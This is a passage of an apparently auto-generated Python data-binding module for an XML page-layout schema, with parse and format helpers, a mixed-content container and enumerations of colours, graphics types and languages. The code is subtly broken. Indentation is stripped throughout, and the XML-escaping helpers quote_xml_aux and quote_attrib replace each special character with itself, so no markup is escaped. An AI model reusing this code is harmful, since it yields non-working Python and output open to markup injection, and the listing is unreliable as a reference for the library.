except NameError:
ModulenotfoundExp_ = ImportError
from six.moves import zip_longest
import os
import re as re_
import base64
import datetime as datetime_
import decimal as decimal_
try:
from lxml import etree as etree_
except ModulenotfoundExp_ :
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
SaveElementTreeNode = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
try:
if isinstance(infile, os.PathLike):
infile = os.path.join(infile)
except AttributeError:
pass
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
def parsexmlstring_(instring, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
element = etree_.fromstring(instring, parser=parser, **kwargs)
return element
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for an example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
# Additionally, the generatedsnamespaces module can contain a python
# dictionary named GenerateDSNamespaceTypePrefixes that associates element
# types with the namespace prefixes that are to be added to the
# "xsi:type" attribute value. See the exportAttributes method of
# any generated element type and the generation of "xsi:type" for an
# example of the use of this table.
# An example table:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceTypePrefixes = {
# "ElementtypeC": "aaa:",
# "ElementtypeD": "bbb:",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ModulenotfoundExp_ :
GenerateDSNamespaceDefs_ = {}
try:
from generatedsnamespaces import GenerateDSNamespaceTypePrefixes as GenerateDSNamespaceTypePrefixes_
except ModulenotfoundExp_ :
GenerateDSNamespaceTypePrefixes_ = {}
#
# You can replace the following class definition by defining an
# importable module named "generatedscollector" containing a class
# named "GdsCollector". See the default class definition below for
# clues about the possible content of that class.
#
try:
from generatedscollector import GdsCollector as GdsCollector_
except ModulenotfoundExp_ :
class GdsCollector_(object):
def __init__(self, messages=None):
if messages is None:
self.messages = []
else:
self.messages = messages
def add_message(self, msg):
self.messages.append(msg)
def get_messages(self):
return self.messages
def clear_messages(self):
self.messages = []
def print_messages(self):
for msg in self.messages:
print("Warning: {}".format(msg))
def write_messages(self, outstream):
for msg in self.messages:
outstream.write("Warning: {}\n".format(msg))
#
# The super-class for enum types
#
try:
from enum import Enum
except ModulenotfoundExp_ :
Enum = object
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ModulenotfoundExp_ as exp:
class GeneratedsSuper(object):
__hash__ = object.__hash__
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_parse_string(self, input_data, node=None, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_parse_integer(self, input_data, node=None, input_name=''):
try:
ival = int(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires integer value: %s' % exp)
return ival
def gds_validate_integer(self, input_data, node=None, input_name=''):
try:
value = int(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires integer value')
return value
def gds_format_integer_list(self, input_data, input_name=''):
if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
input_data = [str(s) for s in input_data]
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integer values')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_parse_float(self, input_data, node=None, input_name=''):
try:
fval_ = float(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires float or double value: %s' % exp)
return fval_
def gds_validate_float(self, input_data, node=None, input_name=''):
try:
value = float(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires float value')
return value
def gds_format_float_list(self, input_data, input_name=''):
if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
input_data = [str(s) for s in input_data]
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of float values')
return values
def gds_format_decimal(self, input_data, input_name=''):
return_value = '%s' % input_data
if '.' in return_value:
return_value = return_value.rstrip('0')
if return_value.endswith('.'):
return_value = return_value.rstrip('.')
return return_value
def gds_parse_decimal(self, input_data, node=None, input_name=''):
try:
decimal_value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return decimal_value
def gds_validate_decimal(self, input_data, node=None, input_name=''):
try:
value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return value
def gds_format_decimal_list(self, input_data, input_name=''):
if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
input_data = [str(s) for s in input_data]
return ' '.join([self.gds_format_decimal(item) for item in input_data])
def gds_validate_decimal_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
decimal_.Decimal(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of decimal values')
return values
def gds_format_double(self, input_data, input_name=''):
return '%s' % input_data
def gds_parse_double(self, input_data, node=None, input_name=''):
try:
fval_ = float(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires double or float value: %s' % exp)
return fval_
def gds_validate_double(self, input_data, node=None, input_name=''):
try:
value = float(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires double or float value')
return value
def gds_format_double_list(self, input_data, input_name=''):
if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
input_data = [str(s) for s in input_data]
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(
node, 'Requires sequence of double or float values')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_parse_boolean(self, input_data, node=None, input_name=''):
if input_data in ('true', '1'):
bval = True
elif input_data in ('false', '0'):
bval = False
else:
raise_parse_error(node, 'Requires boolean value')
return bval
def gds_validate_boolean(self, input_data, node=None, input_name=''):
if input_data not in (True, 1, False, 0, ):
raise_parse_error(
node,
'Requires boolean value '
'(one of True, 1, False, 0)')
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
input_data = [str(s) for s in input_data]
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
value = self.gds_parse_boolean(value, node, input_name)
if value not in (True, 1, False, 0, ):
raise_parse_error(
node,
'Requires sequence of boolean values '
'(one of True, 1, False, 0)')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (
time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns.
# The target value must match at least one of the patterns
# in order for the test to succeed.
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
mo = re_.search(patterns2, target)
if mo is not None and len(mo.group(0)) == len(target):
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_check_cardinality_(
self, value, input_name,
min_occurs=0, max_occurs=1, required=None):
if value is None:
length = 0
elif isinstance(value, list):
length = len(value)
else:
length = 1
if required is not None :
if required and length < 1:
self.gds_collector_.add_message(
"Required value {}{} is missing".format(
input_name, self.gds_get_node_lineno_()))
if length < min_occurs:
self.gds_collector_.add_message(
"Number of values for {}{} is below "
"the minimum allowed, "
"expected at least {}, found {}".format(
input_name, self.gds_get_node_lineno_(),
min_occurs, length))
elif length > max_occurs:
self.gds_collector_.add_message(
"Number of values for {}{} is above "
"the maximum allowed, "
"expected at most {}, found {}".format(
input_name, self.gds_get_node_lineno_(),
max_occurs, length))
def gds_validate_builtin_ST_(
self, validator, value, input_name,
min_occurs=None, max_occurs=None, required=None):
if value is not None:
try:
validator(value, input_name=input_name)
except GDSParseError as parse_error:
self.gds_collector_.add_message(str(parse_error))
def gds_validate_defined_ST_(
self, validator, value, input_name,
min_occurs=None, max_occurs=None, required=None):
if value is not None:
try:
validator(value)
except GDSParseError as parse_error:
self.gds_collector_.add_message(str(parse_error))
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
# provide default value in case option --disable-xml is used.
content = ""
content = etree_.tostring(node, encoding="unicode")
return content
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.items()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2:
if ExternalEncoding:
encoding = ExternalEncoding
else:
encoding = 'utf-8'
return instring.encode(encoding)
else:
return instring
@staticmethod
def convert_unicode(instring):
if isinstance(instring, str):
result = quote_xml(instring)
elif sys.version_info.major == 2 and isinstance(instring, unicode):
result = quote_xml(instring).encode('utf8')
else:
result = GeneratedsSuper.gds_encode(str(instring))
return result
def __eq__(self, other):
def excl_select_objs_(obj):
return (obj[0] != 'parent_object_' and
obj[0] != 'gds_collector_')
if type(self) != type(other):
return False
return all(x == y for x, y in zip_longest(
filter(excl_select_objs_, self.__dict__.items()),
filter(excl_select_objs_, other.__dict__.items())))
def __ne__(self, other):
return not self.__eq__(other)
# Django ETL transform hooks.
def gds_djo_etl_transform(self):
pass
def gds_djo_etl_transform_db_obj(self, dbobj):
pass
# SQLAlchemy ETL transform hooks.
def gds_sqa_etl_transform(self):
return 0, None
def gds_sqa_etl_transform_db_obj(self, dbobj):
pass
def gds_get_node_lineno_(self):
if (hasattr(self, "gds_elementtree_node_") and
self.gds_elementtree_node_ is not None):
return ' near line {}'.format(
self.gds_elementtree_node_.sourceline)
else:
return ""
def getSubclassFromModule_(module, class_):
'''Get the subclass of a class from a specific module.'''
name = class_.__name__ + 'Sub'
if hasattr(module, name):
return getattr(module, name)
else:
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = ''
# Set this to false in order to deactivate during export, the use of
# name space prefixes captured from the input document.
UseCapturedNS_ = True
CapturedNsmap_ = {}
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
"Escape markup chars, but do not modify CDATA sections."
if not inStr:
return ''
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s2 = ''
pos = 0
matchobjects = CDATA_pattern_.finditer(s1)
for mo in matchobjects:
s3 = s1[pos:mo.start()]
s2 += quote_xml_aux(s3)
s2 += s1[mo.start():mo.end()]
pos = mo.end()
s3 = s1[pos:]
s2 += quote_xml_aux(s3)
return s2
def quote_xml_aux(inStr):
s1 = inStr.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
if prefix == 'xml':
namespace = 'http://www.w3.org/XML/1998/namespace'
else:
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
def encode_str_2_3(instr):
return instr
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if node is not None:
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name_=name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element, mapping_=None, nsmap_=None):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self, mapping_=None, nsmap_=None):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class AlignSimpleType(str, Enum):
LEFT='left'
CENTRE='centre'
RIGHT='right'
JUSTIFY='justify'
class ChartTypeSimpleType(str, Enum):
BAR='bar'
LINE='line'
PIE='pie'
SCATTER='scatter'
SURFACE='surface'
OTHER='other'
class ColourDepthSimpleType(str, Enum):
BILEVEL='bilevel'
GREYSCALE='greyscale'
COLOUR='colour'
OTHER='other'
class ColourSimpleType(str, Enum):
BLACK='black'
BLUE='blue'
BROWN='brown'
CYAN='cyan'
GREEN='green'
GREY='grey'
INDIGO='indigo'
MAGENTA='magenta'
ORANGE='orange'
PINK='pink'
RED='red'
TURQUOISE='turquoise'
VIOLET='violet'
WHITE='white'
YELLOW='yellow'
OTHER='other'
class GraphicsTypeSimpleType(str, Enum):
LOGO='logo'
LETTERHEAD='letterhead'
DECORATION='decoration'
FRAME='frame'
HANDWRITTENANNOTATION='handwritten-annotation'
STAMP='stamp'
SIGNATURE='signature'
BARCODE='barcode'
PAPERGROW='paper-grow'
PUNCHHOLE='punch-hole'
OTHER='other'
class GroupTypeSimpleType(str, Enum):
PARAGRAPH='paragraph'
LIST='list'
LISTITEM='list-item'
FIGURE='figure'
ARTICLE='article'
DIV='div'
OTHER='other'
class LanguageSimpleType(str, Enum):
"""ISO 639.x 2016-07-14"""
ABKHAZ='Abkhaz'
AFAR='Afar'
AFRIKAANS='Afrikaans'
AKAN='Akan'
ALBANIAN='Albanian'
AMHARIC='Amharic'
ARABIC='Arabic'
ARAGONESE='Aragonese'
ARMENIAN='Armenian'
ASSAMESE='Assamese'
AVARIC='Avaric'
AVESTAN='Avestan'
AYMARA='Aymara'
AZERBAIJANI='Azerbaijani'
BAMBARA='Bambara'
BASHKIR='Bashkir'
BASQUE='Basque'
BELARUSIAN='Belarusian'
BENGALI='Bengali'
BIHARI='Bihari'
BISLAMA='Bislama'
BOSNIAN='Bosnian'
BRETON='Breton'
BULGARIAN='Bulgarian'
BURMESE='Burmese'
CAMBODIAN='Cambodian'
CANTONESE='Cantonese'
CATALAN='Catalan'
CHAMORRO='Chamorro'
CHECHEN='Chechen'
CHICHEWA='Chichewa'
CHINESE='Chinese'
CHUVASH='Chuvash'
CORNISH='Cornish'
CORSICAN='Corsican'
CREE='Cree'
CROATIAN='Croatian'
CZECH='Czech'
DANISH='Danish'
DIVEHI='Divehi'
DUTCH='Dutch'
DZONGKHA='Dzongkha'
ENGLISH='English'
ESPERANTO='Esperanto'
ESTONIAN='Estonian'
EWE='Ewe'
FAROESE='Faroese'
FIJIAN='Fijian'
FINNISH='Finnish'
FRENCH='French'
FULA='Fula'
GAELIC='Gaelic'
GALICIAN='Galician'
GANDA='Ganda'
GEORGIAN='Georgian'
GERMAN='German'
GREEK='Greek'
GUARANÍ='Guaraní'
GUJARATI='Gujarati'
HAITIAN='Haitian'
HAUSA='Hausa'
HEBREW='Hebrew'
HERERO='Herero'
HINDI='Hindi'
HIRI_MOTU='Hiri Motu'
HUNGARIAN='Hungarian'
ICELANDIC='Icelandic'
IDO='Ido'
IGBO='Igbo'
INDONESIAN='Indonesian'
INTERLINGUA='Interlingua'
INTERLINGUE='Interlingue'
INUKTITUT='Inuktitut'
INUPIAQ='Inupiaq'
IRISH='Irish'
ITALIAN='Italian'
JAPANESE='Japanese'
JAVANESE='Javanese'
KALAALLISUT='Kalaallisut'
KANNADA='Kannada'
KANURI='Kanuri'
KASHMIRI='Kashmiri'
KAZAKH='Kazakh'
KHMER='Khmer'
KIKUYU='Kikuyu'
KINYARWANDA='Kinyarwanda'
KIRUNDI='Kirundi'
KOMI='Komi'
KONGO='Kongo'
KOREAN='Korean'
KURDISH='Kurdish'
KWANYAMA='Kwanyama'
KYRGYZ='Kyrgyz'
LAO='Lao'
LATIN='Latin'
LATVIAN='Latvian'
LIMBURGISH='Limburgish'
LINGALA='Lingala'
LITHUANIAN='Lithuanian'
LUBA_KATANGA='Luba-Katanga'
LUXEMBOURGISH='Luxembourgish'
MACEDONIAN='Macedonian'
MALAGASY='Malagasy'
MALAY='Malay'
MALAYALAM='Malayalam'
MALTESE='Maltese'
MANX='Manx'
MĀORI='Māori'
MARATHI='Marathi'
MARSHALLESE='Marshallese'
MONGOLIAN='Mongolian'
NAURU='Nauru'
NAVAJO='Navajo'
NDONGA='Ndonga'
NEPALI='Nepali'
NORTH_NDEBELE='North Ndebele'
NORTHERN_SAMI='Northern Sami'
NORWEGIAN='Norwegian'
NORWEGIAN_BOKMÅL='Norwegian Bokmål'
NORWEGIAN_NYNORSK='Norwegian Nynorsk'
NUOSU='Nuosu'
OCCITAN='Occitan'
OJIBWE='Ojibwe'
OLD_CHURCH_SLAVONIC='Old Church Slavonic'
ORIYA='Oriya'
OROMO='Oromo'
OSSETIAN='Ossetian'
PĀLI='Pāli'
PANJABI='Panjabi'
PASHTO='Pashto'
PERSIAN='Persian'
POLISH='Polish'
PORTUGUESE='Portuguese'
PUNJABI='Punjabi'
QUECHUA='Quechua'
ROMANIAN='Romanian'
ROMANSH='Romansh'
RUSSIAN='Russian'
SAMOAN='Samoan'
SANGO='Sango'
SANSKRIT='Sanskrit'
SARDINIAN='Sardinian'
SERBIAN='Serbian'
SHONA='Shona'
SINDHI='Sindhi'
SINHALA='Sinhala'
SLOVAK='Slovak'
SLOVENE='Slovene'
SOMALI='Somali'
SOUTH_NDEBELE='South Ndebele'
SOUTHERN_SOTHO='Southern Sotho'
SPANISH='Spanish'
SUNDANESE='Sundanese'
SWAHILI='Swahili'
SWATI='Swati'
SWEDISH='Swedish'
TAGALOG='Tagalog'
TAHITIAN='Tahitian'
TAJIK='Tajik'
TAMIL='Tamil'
TATAR='Tatar'
TELUGU='Telugu'
THAI='Thai'
TIBETAN='Tibetan'
TIGRINYA='Tigrinya'
TONGA='Tonga'
TSONGA='Tsonga'
TSWANA='Tswana'
TURKISH='Turkish'
TURKMEN='Turkmen'
TWI='Twi'
UIGHUR='Uighur'
UKRAINIAN='Ukrainian'
URDU='Urdu'
UZBEK='Uzbek'
VENDA='Venda'
VIETNAMESE='Vietnamese'
VOLAPÜK='Volapük'
WALLOON='Walloon'
WELSH='Welsh'
WESTERN_FRISIAN='Western Frisian'
WOLOF='Wolof'
XHOSA='Xhosa'
